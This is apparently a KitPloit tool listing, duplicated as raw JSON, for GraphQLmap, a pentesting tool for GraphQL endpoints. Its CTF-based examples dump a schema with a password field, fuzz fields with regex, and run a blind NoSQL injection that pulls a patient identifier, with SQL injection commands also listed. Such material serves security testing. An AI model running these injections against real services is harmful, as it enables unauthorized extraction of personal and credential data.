Search...

GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes

2021-05-22T12:30:00

ID KITPLOIT:5693649203913098224
Type kitploit
Reporter KitPloit
Modified 2021-05-22T12:30:00

Description

GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.

Install

$ git clone https://github.com/swisskyrepo/GraphQLmap  
$ python graphqlmap.py                                                                
   _____                 _      ____  _                              
  / ____|               | |    / __ \| |                             
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __    
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \   
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |  
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/   
                  | |                                       | |      
                  |_|                                       |_|      
                                         Author:Swissky Version:1.0  
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]]

optional arguments:  
  -h, --help          show this help message and exit  
  -u    URL              URL to query : example.com/graphql?query={}  
  -v [VERBOSITY]      Enable verbosity  
  --method [METHOD]   HTTP Method to use interact with /graphql endpoint  
  --headers [HEADERS] HTTP Headers sent to /graphql endpoint  
  --json              Send requests using POST and JSON

Features and examples

Examples are based on several CTF challenges from HIP2019.

Connect to a graphql endpoint

python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'

Dump a GraphQL schema

Use dump_new to dump the GraphQL schema, this function will automaticly populate the "autocomplete" with the found fields.



Live Example

GraphQLmap &gt; dump_new                       
============= [SCHEMA] ===============  
e.g: name[Type]: arg (Type!)

Query                                            
        doctor[]: email (String!),                                                               
        doctors[Doctor]:                                                                         
        patients[Patient]:                                                                       
        patient[]: id (ID!),                     
        allrendezvous[Rendezvous]:                                                               
        rendezvous[]: id (ID!),                                                                  
Doctor                                           
        id[ID]:                                                                                     
        firstName[String]:                       
        lastName[String]:                                                                        
        specialty[String]:                       
        patients[None]:   
        rendezvous[None]:   
        email[String]:   
        password[String]:   
[...]

Interact with a GraphQL endpoint

Write a GraphQL request and execute it.

GraphQLmap &gt; {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}  
{  
    "data": {  
        "doctors": [  
            {  
                "firstName": "Admin",  
                "id": "5d089c51dcab2d0032fdd08d",  
                "lastName": "Admin"  
            }  
        ]  
    }  
}

GraphQL field fuzzing

Use GRAPHQL_INCREMENT and GRAPHQL_CHARSET to fuzz a parameter.



Live Example

GraphQLmap &gt; {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}}     
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}}        
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}}     
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}}     
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}}       
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}}  
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}

NoSQLi injection

Use BLIND_PLACEHOLDER inside the query for the nosqli function.



Live Example

GraphQLmap &gt; nosqli  
Query &gt; {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}  
Check &gt; 5d089c51dcab2d0032fdd08d  
Charset &gt; 0123456789abcdef-  
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b  
GraphQLmap &gt;

SQL injection

GraphQLmap &gt; postgresqli  
GraphQLmap &gt; mysqli  
GraphQLmap &gt; mssqli

TODO

Docker with vulnerable GraphQL
Unit tests
Handle node

{
user {
edges {
node {
username
}
}
}
}

Download GraphQLmap

JSON Vulners Source

Initial Source

{"id": "KITPLOIT:5693649203913098224", "bulletinFamily": "tools", "title": "GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes", "description": "[ ![](https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/w640-h328/GraphQLmap.png) ](<https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/s813/GraphQLmap.png>)\n\n \n\n\nGraphQLmap is a [ scripting ](<https://www.kitploit.com/search/label/Scripting> \"scripting\" ) engine to interact with a graphql endpoint for [ pentesting ](<https://www.kitploit.com/search/label/Pentesting> \"pentesting\" ) purposes. \n\n \n\n\n** Install ** \n\n \n \n $ git clone https://github.com/swisskyrepo/GraphQLmap \n $ python graphqlmap.py \n _____ _ ____ _ \n / ____| | | / __ \\| | \n | | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __ \n | | |_ | '__/ _` | '_ \\| '_ \\| | | | | | '_ ` _ \\ / _` | '_ \\ \n | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) | \n \\_____|_| \\__,_| .__/|_| |_|\\___\\_\\______|_| |_| |_|\\__,_| .__/ \n | | | | \n |_| |_| \n Author:Swissky Version:1.0 \n usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL URL to query : example.com/graphql?query={} \n -v [VERBOSITY] Enable verbosity \n --method [METHOD] HTTP Method to use interact with /graphql endpoint \n --headers [HEADERS] HTTP Headers sent to /graphql endpoint \n --json Send requests using POST and JSON\n\n \n** Features and examples ** \n\n\nExamples are based on several CTF challenges from HIP2019. \n\n** Connect to a graphql endpoint ** \n\n \n \n python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{\"Authorization\" : \"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o\"}' \n \n\n \n** Dump a GraphQL schema ** \n\n\nUse ` dump_new ` to dump the GraphQL schema, this function will automaticly populate the \"autocomplete\" with the found fields. \n[ ](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$11\$\" )\n\n[ \uf3a5 ](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$11\$\" )\n\n[ Live Example ](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$11\$\" )\n \n \n GraphQLmap > dump_new \n ============= [SCHEMA] =============== \n e.g: name[Type]: arg (Type!) \n \n Query \n doctor[]: email (String!), \n doctors[Doctor]: \n patients[Patient]: \n patient[]: id (ID!), \n allrendezvous[Rendezvous]: \n rendezvous[]: id (ID!), \n Doctor \n id[ID]: \n firstName[String]: \n lastName[String]: \n specialty[String]: \n patients[None]: \n rendezvous[None]: \n email[String]: \n password[String]: \n [...]\n\n \n** Interact with a GraphQL endpoint ** \n\n\nWrite a GraphQL request and execute it. \n \n \n GraphQLmap > {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admin\\\"} }\"){firstName lastName id}} \n { \n \"data\": { \n \"doctors\": [ \n { \n \"firstName\": \"Admin\", \n \"id\": \"5d089c51dcab2d0032fdd08d\", \n \"lastName\": \"Admin\" \n } \n ] \n } \n }\n\n \n** GraphQL field fuzzing ** \n\n\nUse ` GRAPHQL_INCREMENT ` and ` GRAPHQL_CHARSET ` to fuzz a parameter. \n[ ](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$12\$\" )\n\n[ \uf3a5 ](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$12\$\" )\n\n[ Live Example ](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$12\$\" )\n \n \n GraphQLmap > {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"AdmiGRAPHQL_CHARSET\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi!\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi$\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi%\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi(\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi)\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi*\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi+\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi,\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi-\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi.\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi/\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi0\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi1\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi?\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admin\\\"} }\"){firstName lastName id}}\n\n \n** NoSQLi injection ** \n\n\nUse ` BLIND_PLACEHOLDER ` inside the query for the ` nosqli ` function. \n[ ](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$13\$\" )\n\n[ \uf3a5 ](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$13\$\" )\n\n[ Live Example ](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$13\$\" )\n \n \n GraphQLmap > nosqli \n Query > {doctors(options: \"{\\\"\\\"patients.ssn\\\":1}\", search: \"{ \\\"patients.ssn\\\": { \\\"$regex\\\": \\\"^BLIND_PLACEHOLDER\\\"}, \\\"lastName\\\":\\\"Admin\\\" , \\\"firstName\\\":\\\"Admin\\\" }\"){id, firstName}} \n Check > 5d089c51dcab2d0032fdd08d \n Charset > 0123456789abcdef- \n [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b \n GraphQLmap >\n\n \n** SQL injection ** \n\n \n \n GraphQLmap > postgresqli \n GraphQLmap > mysqli \n GraphQLmap > mssqli\n\n \n** TODO ** \n\n\n * Docker with [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) GraphQL \n * Unit tests \n * Handle node \n \n \n { \n user { \n edges { \n node { \n username \n } \n } \n } \n } \n \n\n \n \n\n\n** [ Download GraphQLmap ](<https://github.com/swisskyrepo/GraphQLmap> \"Download GraphQLmap\" ) **\n", "published": "2021-05-22T12:30:00", "modified": "2021-05-22T12:30:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://www.kitploit.com/2021/05/graphqlmap-scripting-engine-to-interact.html", "reporter": "KitPloit", "references": ["https://github.com/swisskyrepo/GraphQLmap"], "cvelist": [], "immutableFields": [], "type": "kitploit", "lastseen": "2021-05-22T22:33:09", "edition": 1, "viewCount": 209, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-22T22:33:09", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-05-22T22:33:09", "rev": 2}, "vulnersScore": 0.2}, "toolHref": "https://github.com/swisskyrepo/GraphQLmap"}